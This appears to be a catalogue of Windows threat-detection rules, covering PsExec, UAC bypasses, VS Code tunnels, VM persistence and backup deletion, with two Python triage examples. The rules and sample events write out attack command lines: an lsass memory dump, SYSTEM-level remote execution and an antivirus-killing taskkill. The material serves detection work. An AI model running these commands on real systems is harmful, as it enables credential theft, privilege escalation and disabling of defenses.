Psexec Execution | Detects the EULA acceptance flag in a PsExec command line. | https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
PsExec/PAExec Escalation to LOCAL SYSTEM | Detects suspicious command-line flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights. | https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
Potential PsExec Remote Execution | Detects potential PsExec commands that initiate execution on remote systems via common command-line flags used by the utility. | https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
PsExec Service Child Process Execution as LOCAL SYSTEM | Detects a suspicious launch of the PSEXESVC service on this system and a child process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system with the highest privileges rather than only those of the login account (e.g. the administrator account). | https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
PsExec Service Execution | Detects launch of the PSEXESVC service, which means that this system was the target of a PsExec remote execution. | https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.youtube.com/watch?v=ro2QuZTIMBM
Suspicious Use of PsLogList | Detects usage of the PsLogList utility to dump event logs in order to extract admin accounts and perform account discovery, or to delete event logs. | https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/, https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos, https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList, https://twitter.com/EricaZelic/status/1614075109827874817
Sysinternals PsService Execution | Detects usage of Sysinternals PsService, which can be abused for service reconnaissance and tampering. | https://learn.microsoft.com/en-us/sysinternals/downloads/psservice
Sysinternals PsSuspend Execution | Detects usage of Sysinternals PsSuspend, which can be abused to suspend critical processes. | https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend, https://twitter.com/0gtweet/status/1638069413717975046
Sysinternals PsSuspend Suspicious Execution | Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses. | https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend, https://twitter.com/0gtweet/status/1638069413717975046
Potential File Overwrite Via Sysinternals SDelete | Detects the use of SDelete to erase a file rather than the free space. | https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
Potential Privilege Escalation To LOCAL SYSTEM | Detects an unknown program using command-line flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM privileges. | https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
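Several of the Sysinternals rules above (Potential Execution of Sysinternals Tools, Potential LSASS Process Dump Via Procdump, PsExec/PAExec Escalation to LOCAL SYSTEM, Potential PsExec Remote Execution, Potential Privilege Escalation To LOCAL SYSTEM) key on command-line switches rather than the image name, which is what lets them survive a renamed binary. The following is an added example, not code from the page or from Sysinternals: a small Python tokeniser and triage routine that applies those checks to constructed process-creation events. The `OriginalFileName` values used for recognising PsExec and PAExec, the finding strings and the events are my own constructions for the demo.

```python
"""Added example (not from the page or Sysinternals): command-line triage for
the patterns above: the shared -accepteula flag, a procdump full dump of
lsass regardless of the image name, and PsExec/PAExec -s escalation and
remote targets. Events, the OriginalFileName values used for matching and
the finding strings are my own constructions for the demo."""
from __future__ import annotations

import re

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokens(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def triage(event: dict) -> list[str]:
    """Return human-readable findings for one process-creation event."""
    argv = tokens(event.get("CommandLine", ""))
    if not argv:
        return []
    # Switches may start with '-' or '/'; everything else is a positional arg.
    flags = {t.lower().lstrip("-/") for t in argv[1:] if t[:1] in "-/"}
    args = [t for t in argv[1:] if t[:1] not in "-/"]
    # PsExec's PE metadata carries the odd OriginalFileName "psexec.c"; use it
    # so a renamed copy is still recognised. PAExec keeps "PAExec.exe".
    original = event.get("OriginalFileName", "").lower()
    is_psexec = original in {"psexec.c", "paexec.exe"} or any(
        k in argv[0].lower() for k in ("psexec", "paexec"))
    findings = []

    # Potential Execution of Sysinternals Tools: the EULA switch is suite-wide.
    if "accepteula" in flags:
        findings.append("sysinternals -accepteula flag present")

    # Potential LSASS Process Dump Via Procdump: key on the parameters, not the
    # binary name, so "C:\Temp\pd.exe -ma lsass.exe" is caught as well.
    if "ma" in flags and any(a.lower().startswith("lsass") for a in args):
        findings.append("full memory dump of lsass requested (-ma lsass)")

    # PsExec/PAExec escalation to LOCAL SYSTEM and remote execution.
    targets = [a for a in args if a.startswith("\\\\")]
    if "s" in flags:
        if is_psexec:
            findings.append("LOCAL SYSTEM escalation via PsExec/PAExec (-s)")
        else:
            # Potential Privilege Escalation To LOCAL SYSTEM: PsExec-style
            # switches on a binary we could not identify as PsExec/PAExec.
            findings.append("unknown program uses PsExec-style -s flag")
    if targets and is_psexec:
        findings.append("PsExec remote execution target(s): " + ", ".join(targets))
    return findings


# Constructed events (Sysmon EID 1 fields), not captured telemetry.
SAMPLE_EVENTS = [
    {"CommandLine": r"PsExec.exe \\srv01 -accepteula -s cmd /c whoami",
     "OriginalFileName": "psexec.c"},
    {"CommandLine": r"C:\Temp\pd.exe -accepteula -ma lsass.exe C:\Temp\l.dmp",
     "OriginalFileName": "procdump"},
    {"CommandLine": r"C:\Temp\svc.exe -accepteula -s -i cmd.exe",
     "OriginalFileName": "svc.exe"},
    {"CommandLine": r"C:\Tools\PsExec.exe \\srv01 -accepteula ipconfig",
     "OriginalFileName": "psexec.c"},
    {"CommandLine": "autoruns.exe -accepteula", "OriginalFileName": "autoruns.exe"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["CommandLine"], "->", triage(event) or "clean")
```

The second event is the renamed-procdump case the LSASS rule is written for: nothing in the image name says "procdump", but `-ma` plus an `lsass` target is unambiguous. The third is the counterpart for PsExec: the tool could not be identified, so the `-s` switch is reported under the weaker "unknown program" finding rather than as a PsExec escalation.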
Sysmon Configuration Update | Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare-bones one to avoid monitoring without shutting down the service completely. | https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Uninstall Sysinternals Sysmon | Detects the removal of Sysmon, which could be a potential attempt at defense evasion. | https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon
Potential Binary Impersonating Sysinternals Tools | Detects binaries that use the same name as legitimate Sysinternals tools to evade detection. | https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
Sysprep on AppData Folder | Detects a suspicious sysprep process start with the AppData folder as target (as used by the Syndicasec trojan in Symantec's Thrip report). | https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets, https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b
Suspicious Execution of Systeminfo | Detects usage of the "systeminfo" command to retrieve system information. | https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo
Potential Signing Bypass Via Windows Developer Features | Detects when a user enables developer features such as "Developer Mode" or "Application Sideloading", which allow the user to install untrusted packages. | Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
Suspicious Recursive Takeown | Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant them higher permissions on specific files and folders. | https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility
Tap Installer Execution | Detects installation of the well-known TAP virtual network driver, a possible preparation for data exfiltration using tunneling techniques. | https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers
Compressed File Creation Via Tar.EXE | Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. | https://unit42.paloaltonetworks.com/chromeloader-malware/, https://lolbas-project.github.io/lolbas/Binaries/Tar/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
Compressed File Extraction Via Tar.EXE | Detects execution of "tar.exe" in order to extract a compressed file. Adversaries may abuse various utilities to decompress data in order to avoid detection. | https://unit42.paloaltonetworks.com/chromeloader-malware/, https://lolbas-project.github.io/lolbas/Binaries/Tar/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
Taskkill Symantec Endpoint Protection | Detects one of the possible scenarios for disabling Symantec Endpoint Protection. The Symantec Endpoint Protection antivirus services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY\SYSTEM user can execute "taskkill /im ccSvcHst.exe /f" several times, thereby killing the process belonging to the service and thus shutting it down. | https://www.exploit-db.com/exploits/37525, https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection, https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer
Loaded Module Enumeration Via Tasklist.EXE | Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". Attackers often use this to find the process identifier (PID) of the process using the DLL in question, in order to dump its memory or perform other nefarious actions. | https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/, https://pentestlab.blog/tag/svchost/
Taskmgr as LOCAL_SYSTEM | Detects the creation of a taskmgr.exe process in the context of LOCAL_SYSTEM. | Internal Research
New Process Created Via Taskmgr.EXE | Detects the creation of a process via the Windows Task Manager. This might be an attempt to bypass UAC. | https://twitter.com/ReneFreingruber/status/1172244989335810049
Potentially Suspicious Command Targeting Teams Sensitive Files | Detects a command line containing references to the Microsoft Teams database or cookie files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged-in accounts. | https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
Suspicious TSCON Start as SYSTEM | Detects a tscon.exe start as LOCAL SYSTEM. | http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html, https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6, https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement
New Virtual Smart Card Created Via TpmVscMgr.EXE | Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card. | https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr
Bypass UAC via CMSTP | Detects command-line usage of the Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files. | https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md, https://lolbas-project.github.io/lolbas/Binaries/Cmstp/
Suspicious RDP Redirect Using TSCON | Detects a suspicious RDP session redirect using tscon.exe. | http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html, https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6, https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/
UAC Bypass Using Disk Cleanup | Detects the pattern of a UAC bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34). | https://github.com/hfiref0x/UACME
UAC Bypass Using ChangePK and SLUI | Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61). | https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b, https://github.com/hfiref0x/UACME, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
CMSTP UAC Bypass via COM Object Access | Detects a UAC bypass attempt using Microsoft Connection Manager Profile Installer autoelevate-capable COM objects (e.g. UACMe IDs 41, 43, 58 or 65). | https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/, https://twitter.com/hFireF0X/status/897640081053364225, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf, https://github.com/hfiref0x/UACME
UAC Bypass Tools Using ComputerDefaults | Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59). | https://github.com/hfiref0x/UACME
Potential RDP Session Hijacking Activity | Detects potential RDP session hijacking activity on Windows systems. | https://twitter.com/Moti_B/status/909449115477659651
UAC Bypass Using Consent and Comctl32 - Process | Detects the pattern of a UAC bypass using consent.exe and comctl32.dll (UACMe 22). | https://github.com/hfiref0x/UACME
UAC Bypass Using DismHost | Detects the pattern of a UAC bypass using DismHost DLL hijacking (UACMe 63). | https://github.com/hfiref0x/UACME
Bypass UAC via Fodhelper.exe | Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. | https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md
UAC Bypass Using Event Viewer RecentViews | Detects the pattern of a UAC bypass using Event Viewer RecentViews. | https://twitter.com/orange_8361/status/1518970259868626944, https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute
UAC Bypass Using NTFS Reparse Point - Process | Detects the pattern of a UAC bypass using an NTFS reparse point and wusa.exe DLL hijacking (UACMe 36). | https://github.com/hfiref0x/UACME
UAC Bypass via ICMLuaUtil | Detects the pattern of a UAC bypass using the ICMLuaUtil elevated COM interface. | https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html
UAC Bypass Using IDiagnostic Profile | Detects the "IDiagnosticProfileUAC" UAC bypass technique. | https://github.com/Wh04m1001/IDiagnosticProfileUAC
UAC Bypass Using IEInstal - Process | Detects the pattern of a UAC bypass using IEInstal.exe (UACMe 64). | https://github.com/hfiref0x/UACME
UAC Bypass via Windows Firewall Snap-In Hijack | Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. | https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack
UAC Bypass Using MSConfig Token Modification - Process | Detects the pattern of a UAC bypass using an msconfig GUI hack (UACMe 55). | https://github.com/hfiref0x/UACME
UAC Bypass Using PkgMgr and DISM | Detects the pattern of a UAC bypass using pkgmgr.exe and dism.exe (UACMe 23). | https://github.com/hfiref0x/UACME
Potential UAC Bypass Via Sdclt.EXE | A general detection for sdclt.exe being spawned as an elevated process, which could indicate sdclt being used in UAC bypass techniques. | https://github.com/OTRF/detection-hackathon-apt29/issues/6, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
TrustedPath UAC Bypass Pattern | Detects indicators of a UAC bypass method that mocks trusted directories (e.g. a "C:\Windows \System32" folder whose name carries a trailing space). | https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e, https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows, https://github.com/netero1010/TrustedPath-UACBypass-BOF
UAC Bypass Abusing Winsat Path Parsing - Process | Detects the pattern of a UAC bypass using a path parsing issue in winsat.exe (UACMe 52). | https://github.com/hfiref0x/UACME
UAC Bypass Using Windows Media Player - Process | Detects the pattern of a UAC bypass using Windows Media Player's osksupport.dll (UACMe 32). | https://github.com/hfiref0x/UACME
Bypass UAC via WSReset.exe | Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. | https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html, https://lolbas-project.github.io/lolbas/Binaries/Wsreset/, https://www.activecyber.us/activelabs/windows-uac-bypass, https://twitter.com/ReaQta/status/1222548288731217921
UAC Bypass WSReset | Detects the pattern of a UAC bypass via WSReset (detectable with the default sysmon-config). | https://lolbas-project.github.io/lolbas/Binaries/Wsreset/, https://github.com/hfiref0x/UACME, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
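Most of the process-based UAC bypass rules above (fodhelper, computerdefaults, sdclt, wsreset, slui/changepk, eventvwr, cmstp, DismHost) reduce to one relation: an auto-elevating Microsoft binary is the parent, the child runs at High or System integrity, and the child is a shell or something outside the Windows directory. The TrustedPath rule is different in kind: it is a path-normalisation check. The following is an added example, not code from the page or from UACMe, showing both checks over constructed Sysmon-style events. The parent set, the shell list and the events are my own assumptions for the demo and do not cover the COM-based variants (ICMLuaUtil, IDiagnosticProfile) or the full UACMe catalogue.

```python
"""Added example (not from the page or UACMe): the parent/child plus
integrity-level pattern the UAC bypass rules above share, and the
trailing-space "mock trusted directory" check behind the TrustedPath rule.
The parent set, the shell list and all events are my own assumptions for the
demo, not a complete catalogue of UACMe methods."""
from __future__ import annotations

import ntpath

# Auto-elevating binaries commonly abused as the elevated parent (assumed set).
AUTO_ELEVATE_PARENTS = {
    "fodhelper.exe", "computerdefaults.exe", "sdclt.exe", "wsreset.exe",
    "slui.exe", "changepk.exe", "eventvwr.exe", "cmstp.exe", "dismhost.exe",
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
          "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
ELEVATED = {"high", "system"}


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def is_mock_trusted_dir(path: str) -> bool:
    """True when a directory component ends in whitespace, e.g.
    'C:\\Windows \\System32\\winsat.exe'. The elevation check normalises the
    path (dropping the space) and so treats it as the trusted System32, while
    the binary and any side-by-side DLL actually load from the attacker's
    space-named folder (see the Tenable write-up cited above)."""
    parts = path.replace("/", "\\").split("\\")
    return any(part != part.rstrip() for part in parts[:-1])


def assess(event: dict) -> list[str]:
    """Findings for one process-creation event (Sysmon EID 1 field names)."""
    findings = []
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    level = event.get("IntegrityLevel", "").lower()
    if is_mock_trusted_dir(image) or is_mock_trusted_dir(parent):
        findings.append("execution from mock trusted directory (TrustedPath UAC bypass)")
    if _name(parent) in AUTO_ELEVATE_PARENTS and level in ELEVATED:
        in_windows = image.replace("/", "\\").lower().startswith("c:\\windows\\")
        # An auto-elevated parent spawning a shell, or anything outside the
        # Windows directory, at High integrity is the bypass signature.
        if _name(image) in SHELLS or not in_windows:
            findings.append(
                f"elevated child {_name(image)} of auto-elevating {_name(parent)}")
    return findings


# Constructed events, not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe", "IntegrityLevel": "High"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\payload.exe",
     "ParentImage": r"C:\Windows\System32\sdclt.exe", "IntegrityLevel": "High"},
    {"Image": r"C:\Windows \System32\winsat.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\wsreset.exe",           # benign: user opened it
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "High"},
    {"Image": r"C:\Windows\System32\cmd.exe",               # benign: not elevated
     "ParentImage": r"C:\Windows\System32\fodhelper.exe", "IntegrityLevel": "Medium"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["Image"], "<-", event["ParentImage"], "->", assess(event) or "clean")
```

The last two events are the ones that keep this rule quiet in production: the auto-elevating binary itself running at High integrity is normal, and a child at Medium integrity means no elevation happened, so `IntegrityLevel` has to be part of the logic rather than an afterthought.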
Use of UltraVNC Remote Access Software | An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. | https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md
Suspicious UltraVNC Execution | Detects a suspicious UltraVNC command-line flag combination that indicates an auto-reconnect upon execution, e.g. at startup (as seen used by the Gamaredon threat group). | https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine, https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution, https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html
Uninstall Crowdstrike Falcon Sensor | Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling the CrowdStrike Falcon sensor. | https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Windows Credential Manager Access via VaultCmd | Detects listing of credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe. | https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd
Uncommon Userinit Child Process | Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. | https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html, https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core
Verclsid.exe Runs COM Object | Detects when verclsid.exe is used to run a COM object via its GUID. | https://lolbas-project.github.io/lolbas/Binaries/Verclsid/, https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5, https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
Detect Virtualbox Driver Installation OR Starting Of VMs | Adversaries can carry out malicious operations inside a virtual instance to avoid detection. This rule detects the registration of the VirtualBox driver or the start of a VirtualBox VM. | https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/, https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/
Suspicious VBoxDrvInst.exe Parameters | Detects VBoxDrvInst.exe run with parameters that allow processing an INF file. This allows creating registry values and installing drivers; for example, one could use this technique to obtain persistence by modifying one of the Run or RunOnce registry keys. | https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml, https://twitter.com/pabraeken/status/993497996179492864
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script | Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a specific script to run on a specific VM state change. | https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/, https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/
Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script | Detects execution of "VMwareToolBoxCmd.exe" with the "script" and "set" flags to set up a script located in a potentially suspicious location to run on a specific VM state change. | https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/
VMToolsd Suspicious Child Process | Detects suspicious child process creations of the VMware Tools process, which may indicate persistence setup. | https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/, https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png, https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf
Potentially Suspicious Child Process Of VsCode | Detects uncommon or suspicious child processes spawning from a VS Code "code.exe" process. This could indicate an attempt at persistence via VS Code tasks or terminal profiles. | https://twitter.com/nas_bench/status/1618021838407495681, https://twitter.com/nas_bench/status/1618021415852335105
Visual Studio Code Tunnel Execution | Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel. | https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels
Visual Studio Code Tunnel Shell Execution | Detects the execution of a shell (powershell, bash, wsl, ...) via a Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. | https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels
Renamed Visual Studio Code Tunnel Execution | Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel. | https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels
Visual Studio Code Tunnel Service Installation | Detects the installation of the VS Code tunnel (code-tunnel) as a service. | https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://code.visualstudio.com/docs/remote/tunnels
Potential Binary Proxy Execution Via VSDiagnostics.EXE | Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. | https://twitter.com/0xBoku/status/1679200664013135872
Suspicious Vsls-Agent Command With AgentExtensionPath Load | Detects Microsoft Visual Studio vsls-agent.exe LOLBIN execution with a suspicious library load via the --agentExtensionPath parameter. | https://twitter.com/bohops/status/1583916360404729857
Use of W32tm as Timer | When configured with suitable command-line arguments, w32tm can act as a delay mechanism. | https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md, https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains
Wab Execution From Non Default Location | Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non-default locations, as seen with Bumblebee activity. | https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime, https://thedfirreport.com/2022/09/26/bumblebee-round-two/
Wab/Wabmig Unusual Parent Or Child Processes Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime, https://thedfirreport.com/2022/09/26/bumblebee-round-two/
All Backups Deleted Via Wbadmin.EXE Detects the deletion of all backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup
Windows Backup Deleted Via Wbadmin.EXE Detects the deletion of backups or system state backups via "wbadmin.exe". This technique is used by numerous ransomware families and actors. This may only be successful on server platforms that have Windows Backup enabled. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup
